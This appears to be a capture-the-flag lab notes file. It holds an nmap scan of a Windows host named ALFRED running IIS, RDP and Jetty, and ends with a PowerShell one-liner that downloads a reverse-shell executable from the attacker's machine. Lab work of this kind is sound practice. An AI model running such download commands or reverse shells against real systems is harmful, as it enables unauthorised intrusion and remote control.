# Nmap 7.91 scan initiated Fri Aug 20 20:46:13 2021 as: nmap -sC -sV -Pn -oN nmap/initial 10.10.104.174
Nmap scan report for 10.10.104.174
Host is up (0.18s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
3389/tcp open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: ALFRED
|   NetBIOS_Domain_Name: ALFRED
|   NetBIOS_Computer_Name: ALFRED
|   DNS_Domain_Name: alfred
|   DNS_Computer_Name: alfred
|   Product_Version: 6.1.7601
|_  System_Time: 2021-08-21T03:48:09+00:00
| ssl-cert: Subject: commonName=alfred
| Not valid before: 2021-08-20T03:46:13
|_Not valid after:  2022-02-19T03:46:13
|_ssl-date: 2021-08-21T03:48:13+00:00; +3s from scanner time.
8080/tcp open  http               Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 2s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug 20 20:48:10 2021 -- 1 IP address (1 host up) scanned in 116.77 seconds


powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.2.87.252/Windows_revshell.exe', 'revshell.exe')"